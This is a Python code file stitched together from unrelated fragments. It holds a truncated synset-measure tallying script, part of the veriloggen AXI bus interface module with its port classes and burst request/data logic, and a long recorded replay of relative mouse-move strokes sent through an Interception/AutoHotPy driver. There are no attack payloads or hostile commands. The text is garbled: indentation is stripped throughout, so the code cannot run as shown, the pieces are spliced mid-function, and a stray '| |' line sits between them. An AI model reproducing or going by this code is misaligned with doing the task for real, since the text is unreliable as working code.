adict4 = {1:OrderedDict(), 2:{}, 3:{}}
adict5 = {1:OrderedDict(), 2:{}, 3:{}}
adict6 = {1:OrderedDict(), 2:{}, 3:{}}
print('\n\n\n =========================')
for layer in adict:
for synset in adict[layer]:
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict_[layer][synset] = ((per, inte, hubs), peaks)
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict2[layer][synset] = ((per, inte, hubs), peaks)
measures_ = [i for i in measures if '_' not in i]
per = sum([i[0]=='p' for i in measures_])
inte = sum([i[0]=='i' for i in measures_])
hubs = sum([i[0]=='h' for i in measures_])
peaks_ = sum(['hp' in i or 'ph' in i for i in measures_])+inte
adict3[layer][synset] = ((per, inte, hubs), peaks_)
total = [0, 0, 0]
for measure in measures:
val = 1
if '_' in measure:
val *=.5
print('times .5 ===========<')
if '*' in measure:
val *= 2
if measure[0] == 'p':
total[0] += val
# leonardt/veriloggen
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import functools
import math
import veriloggen.core.vtypes as vtypes
from veriloggen.seq.seq import Seq
from veriloggen.fsm.fsm import FSM
import veriloggen.dataflow as _df
from veriloggen.dataflow.dataflow import DataflowManager
from veriloggen.dataflow.dtypes import make_condition, read_multi
from veriloggen.dataflow.dtypes import _Numeric as df_numeric
from . import util
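# _connect_ready() merges an additional ready condition into a wire's continuous
# assignment: if 'var' has no assignment yet it simply gets one; otherwise the
# existing right-hand side is rewritten as (old | val) and the assign statement
# is re-appended at the end of the module items.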
def _connect_ready(m, var, val):
prev_assign = var._get_assign()
if not prev_assign:
var.assign(val)
else:
prev_assign.overwrite_right(
vtypes.Ors(prev_assign.statement.right, val))
m.remove(prev_assign)
m.append(prev_assign)
class AxiBase(object):
_I = util.t_Input
_O = util.t_OutputReg
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
if itype is None:
itype = self._I
if otype is None:
otype = self._O
self.m = m
self.datawidth = datawidth
self.addrwidth = addrwidth
self.itype = itype
self.otype = otype
self.lite = lite
class AxiWriteAddress(AxiBase):
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.awaddr = util.make_port(
m, self.otype, name + '_awaddr', self.addrwidth, initval=0)
if not self.lite:
self.awlen = util.make_port(
m, self.otype, name + '_awlen', 8, initval=0)
self.awvalid = util.make_port(
m, self.otype, name + '_awvalid', None, initval=0)
self.awready = util.make_port(
m, self.itype, name + '_awready', None, initval=0)
class AxiWriteData(AxiBase):
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.wdata = util.make_port(
m, self.otype, name + '_wdata', self.datawidth, initval=0)
self.wstrb = util.make_port(
m, self.otype, name + '_wstrb', self.datawidth // 8, initval=0)
if not self.lite:
self.wlast = util.make_port(
m, self.otype, name + '_wlast', None, initval=0)
self.wvalid = util.make_port(
m, self.otype, name + '_wvalid', None, initval=0)
self.wready = util.make_port(
m, self.itype, name + '_wready', None, initval=0)
class AxiReadAddress(AxiBase):
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.araddr = util.make_port(
m, self.otype, name + '_araddr', self.addrwidth, initval=0)
if not self.lite:
self.arlen = util.make_port(
m, self.otype, name + '_arlen', 8, initval=0)
self.arvalid = util.make_port(
m, self.otype, name + '_arvalid', None, initval=0)
self.arready = util.make_port(
m, self.itype, name + '_arready', None, initval=0)
class AxiReadData(AxiBase):
_O = util.t_Output
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.rdata = util.make_port(
m, self.itype, name + '_rdata', self.datawidth, initval=0)
if not self.lite:
self.rlast = util.make_port(
m, self.itype, name + '_rlast', None, initval=0)
self.rvalid = util.make_port(
m, self.itype, name + '_rvalid', None, initval=0)
self.rready = util.make_port(
m, self.otype, name + '_rready', None, initval=0)
class AxiMasterWriteAddress(AxiWriteAddress):
pass
class AxiMasterWriteData(AxiWriteData):
pass
class AxiMasterReadAddress(AxiReadAddress):
pass
class AxiMasterReadData(AxiReadData):
pass
class AxiSlaveWriteAddress(AxiWriteAddress):
_I = util.t_Output
_O = util.t_Input
class AxiSlaveWriteData(AxiWriteData):
_I = util.t_Output
_O = util.t_Input
class AxiSlaveReadAddress(AxiReadAddress):
_I = util.t_Output
_O = util.t_Input
class AxiSlaveReadData(AxiReadData):
_I = util.t_OutputReg
_O = util.t_Input
class AxiMaster(object):
burst_size_width = 8
boundary_size = 4096
def __init__(self, m, name, clk, rst, datawidth=32, addrwidth=32,
lite=False, noio=False, nodataflow=False):
self.m = m
self.name = name
self.clk = clk
self.rst = rst
self.datawidth = datawidth
self.addrwidth = addrwidth
self.lite = lite
self.noio = noio
if not hasattr(self.m, 'masterbus'):
self.m.masterbus = []
self.m.masterbus.append(self)
itype = util.t_Wire if noio else None
otype = util.t_Reg if noio else None
self.waddr = AxiMasterWriteAddress(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
self.wdata = AxiMasterWriteData(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
self.raddr = AxiMasterReadAddress(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
otype = util.t_Wire if noio else None
self.rdata = AxiMasterReadData(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
self.seq = Seq(m, name, clk, rst)
self.write_counters = []
self.read_counters = []
if nodataflow:
self.df = None
else:
self.df = DataflowManager(self.m, self.clk, self.rst)
self._write_disabled = False
self._read_disabled = False
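    # Rough usage sketch (illustrative only; 'm', 'clk', 'rst' and the FSM 'fsm'
    # are assumed to be created elsewhere with veriloggen's Module/FSM helpers):
    #
    #   myaxi = AxiMaster(m, 'myaxi', clk, rst, datawidth=32, addrwidth=32)
    #   ack, counter = myaxi.write_request(0x1000, length=16, cond=fsm)
    #   ack, last = myaxi.write_data(wdata, counter, cond=fsm)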
def disable_write(self):
ports = [self.waddr.awaddr(0)]
if not self.lite:
ports.append(self.waddr.awlen(0))
ports.extend([self.waddr.awvalid(0),
self.wdata.wdata(0),
self.wdata.wstrb(0),
self.wdata.wvalid(0)])
if not self.lite:
ports.append(self.wdata.wlast(0))
self.seq(
*ports
)
self._write_disabled = True
def disable_read(self):
ports = [self.raddr.araddr(0)]
if not self.lite:
ports.append(self.raddr.arlen(0))
ports.append(self.raddr.arvalid(0))
self.seq(
*ports
)
self.rdata.rready.assign(0)
self._read_disabled = True
def mask_addr(self, addr):
s = util.log2(self.datawidth // 8)
return (addr >> s) << s
def check_boundary(self, addr, length, datawidth=None, boundary_size=None):
if datawidth is None:
datawidth = self.datawidth
if boundary_size is None:
boundary_size = self.boundary_size
mask = boundary_size - 1
return ((addr & mask) + (length << util.log2(datawidth // 8))) >= boundary_size
def rest_boundary(self, addr, datawidth=None, boundary_size=None):
if datawidth is None:
datawidth = self.datawidth
if boundary_size is None:
boundary_size = self.boundary_size
mask = boundary_size - 1
return (vtypes.Int(boundary_size) - (addr & mask)) >> util.log2(datawidth // 8)
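    # AXI bursts must not cross a 4096-byte (boundary_size) address boundary:
    # check_boundary() tests whether a transfer of 'length' beats starting at
    # 'addr' would cross it, and rest_boundary() returns how many beats still
    # fit before the next boundary.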
def write_request(self, addr, length=1, cond=None, counter=None):
"""
@return ack, (counter)
"""
if self._write_disabled:
raise TypeError('Write disabled.')
if self.lite:
if length != 1:
raise ValueError('length must be 1 for lite-interface.')
return self._write_request_lite(addr, cond)
return self._write_request_full(addr, length, cond, counter)
def _write_request_lite(self, addr, cond=None):
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.waddr.awready, vtypes.Not(self.waddr.awvalid))
self.seq.If(ack)(
self.waddr.awaddr(addr),
self.waddr.awvalid(1),
)
# de-assert
self.seq.Delay(1)(
self.waddr.awvalid(0)
)
# retry
self.seq.If(vtypes.Ands(self.waddr.awvalid, vtypes.Not(self.waddr.awready)))(
self.waddr.awvalid(self.waddr.awvalid)
)
return ack
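    # The assert/de-assert/retry pattern above implements the AXI valid/ready
    # handshake: awvalid is raised when the channel is free, scheduled to drop
    # one cycle later, but held high again if awready has not yet been observed,
    # so valid stays asserted until the slave accepts the address.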
def _write_request_full(self, addr, length=1, cond=None, counter=None):
if isinstance(length, int) and length > 2 ** self.burst_size_width:
raise ValueError("length must be less than 257.")
if isinstance(length, int) and length < 1:
raise ValueError("length must be more than 0.")
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.waddr.awready, vtypes.Not(self.waddr.awvalid))
if counter is None:
counter = self.m.TmpReg(self.burst_size_width + 1, initval=0)
self.write_counters.append(counter)
self.seq.If(vtypes.Ands(ack, counter == 0))(
self.waddr.awaddr(addr),
self.waddr.awlen(length - 1),
self.waddr.awvalid(1),
counter(length)
)
self.seq.Then().If(length == 0)(
self.waddr.awvalid(0)
)
# de-assert
self.seq.Delay(1)(
self.waddr.awvalid(0)
)
# retry
self.seq.If(vtypes.Ands(self.waddr.awvalid, vtypes.Not(self.waddr.awready)))(
self.waddr.awvalid(self.waddr.awvalid)
)
return ack, counter
def write_data(self, data, counter=None, cond=None):
"""
@return ack, (last)
"""
if self._write_disabled:
raise TypeError('Write disabled.')
if self.lite:
return self._write_data_lite(data, cond)
return self._write_data_full(data, counter, cond)
def _write_data_lite(self, data, cond=None):
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.wdata.wready, vtypes.Not(self.wdata.wvalid))
self.seq.If(ack)(
self.wdata.wdata(data),
self.wdata.wvalid(1),
self.wdata.wstrb(vtypes.Repeat(
vtypes.Int(1, 1), (self.wdata.datawidth // 8)))
)
# de-assert
self.seq.Delay(1)(
self.wdata.wvalid(0),
)
# retry
self.seq.If(vtypes.Ands(self.wdata.wvalid, vtypes.Not(self.wdata.wready)))(
self.wdata.wvalid(self.wdata.wvalid)
)
return ack
def _write_data_full(self, data, counter=None, cond=None):
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if counter is None:
counter = self.write_counters[-1]
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ands(counter > 0,
vtypes.Ors(self.wdata.wready, vtypes.Not(self.wdata.wvalid)))
last = self.m.TmpReg(initval=0)
self.seq.If(vtypes.Ands(ack, counter > 0))(
self.wdata.wdata(data),
self.wdata.wvalid(1),
self.wdata.wlast(0),
self.wdata.wstrb(vtypes.Repeat(
vtypes.Int(1, 1), (self.wdata.datawidth // 8))),
counter.dec()
)
self.seq.Then().If(counter == 1)(
self.wdata.wlast(1),
last(1)
)
# de-assert
self.seq.Delay(1)(
self.wdata.wvalid(0),
self.wdata.wlast(0),
last(0)
)
# retry
self.seq.If(vtypes.Ands(self.wdata.wvalid, vtypes.Not(self.wdata.wready)))(
self.wdata.wvalid(self.wdata.wvalid),
self.wdata.wlast(self.wdata.wlast),
last(last)
)
return ack, last
def write_dataflow(self, data, counter=None, cond=None, when=None):
"""
@return done
'data' and 'when' must be dataflow variables
"""
if self.lite:
raise TypeError('lite interface does not support dataflow operations.')
if self._write_disabled:
raise TypeError('Write disabled.')
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if counter is None:
counter = self.write_counters[-1]
ack = vtypes.Ands(counter > 0,
vtypes.Ors(self.wdata.wready, vtypes.Not(self.wdata.wvalid)))
last = self.m.TmpReg(initval=0)
if cond is None:
cond = ack
else:
cond = (cond, ack)
if when is None or not isinstance(when, df_numeric):
raw_data, raw_valid = data.read(cond=cond)
else:
data_list, raw_valid = read_multi(self.m, data, when, cond=cond)
raw_data = data_list[0]
when = data_list[1]
when_cond = make_condition(when, ready=cond)
if when_cond is not None:
raw_valid = vtypes.Ands(when_cond, raw_valid)
# write condition
self.seq.If(raw_valid)
self.seq.If(vtypes.Ands(ack, counter > 0))(
self.wdata.wdata(raw_data),
self.wdata.wvalid(1),
self.wdata.wlast(0),
self.wdata.wstrb(vtypes.Repeat(
vtypes.Int(1, 1), (self.wdata.datawidth // 8))),
counter.dec()
)
self.seq.Then().If(counter == 1)(
self.wdata.wlast(1),
last(1)
)
# de-assert
self.seq.Delay(1)(
self.wdata.wvalid(0),
self.wdata.wlast(0),
last(0)
)
# retry
self.seq.If(vtypes.Ands(self.wdata.wvalid, vtypes.Not(self.wdata.wready)))(
self.wdata.wvalid(self.wdata.wvalid),
self.wdata.wlast(self.wdata.wlast),
last(last)
)
done = vtypes.Ands(last, self.wdata.wvalid, self.wdata.wready)
return done
def read_request(self, addr, length=1, cond=None, counter=None):
"""
@return ack, (counter)
"""
if self._read_disabled:
raise TypeError('Read disabled.')
if self.lite:
if length != 1:
raise ValueError('length must be 1 for lite-interface.')
return self._read_request_lite(addr, cond)
return self._read_request_full(addr, length, cond, counter)
def _read_request_lite(self, addr, cond=None):
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.raddr.arready, vtypes.Not(self.raddr.arvalid))
self.seq.If(ack)(
self.raddr.araddr(addr),
self.raddr.arvalid(1)
)
# de-assert
self.seq.Delay(1)(
self.raddr.arvalid(0)
)
# retry
self.seq.If(vtypes.Ands(self.raddr.arvalid, vtypes.Not(self.raddr.arready)))(
self.raddr.arvalid(self.raddr.arvalid)
)
return ack
def _read_request_full(self, addr, length=1, cond=None, counter=None):
if isinstance(length, int) and length > 2 ** self.burst_size_width:
raise ValueError("length must be less than 257.")
if isinstance(length, int) and length < 1:
raise ValueError("length must be more than 0.")
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.raddr.arready, vtypes.Not(self.raddr.arvalid))
if counter is None:
counter = self.m.TmpReg(self.burst_size_width + 1, initval=0)
| |
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0010008811950683594)
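# Each block below replays one recorded mouse event: it builds an
# InterceptionMouseStroke describing a relative move of at most one pixel,
# sends it to the default mouse device, then sleeps for the recorded
# inter-event delay before the next stroke.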
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004022121429443359)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005870342254638672)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0034017562866210938)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0016562938690185547)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0049991607666015625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0050084590911865234)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0009641647338867188)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005999565124511719)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004018306732177734)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030040740966796875)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005737781524658203)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0003876686096191406)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005014181137084961)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019986629486083984)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004001140594482422)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.001992940902709961)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.003000974655151367)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0033020973205566406)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030715465545654297)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0031833648681640625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0018248558044433594)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029997825622558594)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.002016305923461914)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.002988100051879883)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0052280426025390625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0015339851379394531)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029036998748779297)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019998550415039062)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019943714141845703)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030050277709960938)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.002000570297241211)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0042307376861572266)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0008392333984375)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005442142486572266)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029973983764648438)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030002593994140625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0009996891021728516)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005002021789550781)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
